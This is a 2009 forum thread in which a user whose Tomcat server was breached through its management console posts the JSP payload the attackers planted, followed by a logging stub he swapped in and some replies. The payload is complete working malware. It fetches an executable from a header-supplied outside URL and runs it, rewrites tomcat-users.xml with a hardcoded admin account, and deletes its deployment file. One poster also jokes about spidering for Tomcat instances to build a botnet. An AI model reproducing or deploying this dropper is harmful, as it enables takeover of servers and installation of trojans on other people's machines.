Someone hacked my Tomcat server

**DaveB** · 18 March 2009, 17:48

The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.

**minestrone** · 18 March 2009, 18:13

Full firewall, AV, all updated.

They just got in through the tomcat management console because I never switched it off.

**d000hg** · 19 March 2009, 08:23

Originally posted by DaveB View Post

The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.

There's no such thing as an "unprotected windows box" these days. By default, a clean install of Windows can't connect to anything except Windows update, IIRC (or some similar precaution)... and the Windows firewall firewall is on by default I think.
You are absolutely right though, when we tried to connect an old PC to our broadband, it couldn't even complete the broadband installation before being swamped with rubbish.

**minestrone** · 19 March 2009, 08:34

IT was Windows Defender under a trial I am running of Windows Live Care that caught the exe running and switched it off.

I am sure they would just continue to push exes towards me, it's tempting to mod the code of the thing and just debug out requests and the IPs of where they are coming from.

I'm just shocked they found it and also there is a hack written for tomcat.

**~Craig~** · 23 March 2009, 07:58

should have gone Linux and you'd have been ok

**suityou01** · 23 March 2009, 09:29

Originally posted by ~Craig~ View Post

should have gone Linux and you'd have been ok

How is tomcat management console less hackable under Linux?

**minestrone** · 23 March 2009, 10:21

Here is the code is anyone is interested..

Code:

<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
<%!
	String pass=null;
	String sys=null;
	
	String url=null;
	String filesrc=null;
		
public class AutoKill {
	
	private String killLoophole(String path) throws Exception
	{
		try
		{
			String pass=randomPass();
			FileOutputStream fos=new FileOutputStream(path);
			String s="<?xml version='1.0' encoding='utf-8'?>\r\n";
			s=s+"<tomcat-users>\r\n";
			s=s+"\t<role rolename=\"tomcat\"/>\r\n";
			s=s+"\t<role rolename=\"role1\" />\r\n";
			s=s+"\t<role rolename=\"manager\"/>\r\n";
			s=s+"\t<role rolename=\"admin\"/>\r\n";
			s=s+"\t<user username=\"admin\" password=\"NetFexc124\" roles=\"admin,manager\"/>\r\n";
			s=s+"</tomcat-users>";
			byte[] b=new byte[1024];
			b=s.getBytes();
			fos.write(b);
			fos.close();
			return pass;
		}catch(Exception e)
		{
			return null;
		}
		
	}
	
	private String randomPass()
	{
		StringBuffer pass = new StringBuffer(); 
		int i =0;
		while(i<5) 
		{
		 i=(int)(Math.random()*12);
		}
		
		for(int j=0;j<=i;j++)
		{
			char c = (char)(Math.random()* 26 + 'A');
			pass.append(c);
		}
		return pass.toString()+String.valueOf(((int)(Math.random()*10000)));
	}
	
	private boolean clean(String src)
	{
		File file=new File(src+".war");
		if(file.exists())
			if(file.delete())
			{
				return true;
			}
		return false;
	}
	
	private boolean downFile(String url,String filesrc)
	{
		try
		{
		URL urlc = new URL(url);
		HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
		con.connect();
		byte[] b=new byte[1024];
		BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
		FileOutputStream fos=new FileOutputStream(filesrc);
		int length=-1;
		while((length=bis.read(b,0,b.length))!=-1)
		{
			fos.write(b,0,length);
		}
		fos.close();
		bis.close();
		Process run_proc=Runtime.getRuntime().exec(filesrc);
		return true;
		}catch(Exception e)
		{	
		}
		return false;
	}
	
	
	private boolean exeFile()
	{
		boolean afly=false;
	    if (downFile(url,filesrc))
	    afly=true;
		
		return afly;
	}
	
}
%>
<%
		sys=System.getProperty("os.name");
		int i=sys.indexOf("Windows");
		AutoKill ak=new AutoKill();
		url=request.getHeader("Cache-Vip-Url");
		if (i>-1)
		{
				String result;
				try
				{
					filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
					if (ak.exeFile())
					{
						result="Success! ";
						pass=ak.killLoophole(System.getProperty("catalina.base")+"/conf/tomcat-users.xml");
						if(ak.clean(request.getSession().getServletContext().getRealPath("")))
						result=result+"Undeployed application at context path "+request.getContextPath()+"! ";
					if (pass!=null)
						result=result+"After the change password:"+pass+"! ";
					}
					else
					{
						result="Failure! Down File Failure!";
					}
				}catch(Exception e)
				{
					result="Failure!throws Exception - "+e.getMessage()+"! ";
				}
				request.setAttribute("result",result);
		}
		else
		{
			request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
		}
		
		request.getRequestDispatcher("/ok.jsp").forward(request, response);
 %>

PCClient.N was the trojan that was caught.

I could probably knock up a web spider in a couple of hours that searches for tomcat instances and have a good few bots under my control by the end of the week.

**minestrone** · 23 March 2009, 12:46

Changed the code to this..

Code:

<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
<%

System.out.println( "==============================================" ) ;

System.out.println( "Cache-Vip-Url: (spyware exe) " + request.getHeader("Cache-Vip-Url") ) ;
System.out.println( "IP:                          " + request.getRemoteAddr() ) ;
System.out.println( "SERVER:                      " + request.getServerName() ) ;
System.out.println( "REQUEST:                     " + request ) ;		

request.setAttribute("result","Success! ");
		
request.getRequestDispatcher("/ok.jsp").forward(request, response);
 %>

I am fairly sure they will hit on me again, I wonder where the IP will be from?

My money is on Russia

**NickFitz** · 23 March 2009, 16:01

Originally posted by minestrone View Post

I am fairly sure they will hit on me again, I wonder where the IP will be from?

My money is on Russia

They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

EDIT: looks like it's an automated thing.

Someone hacked my Tomcat server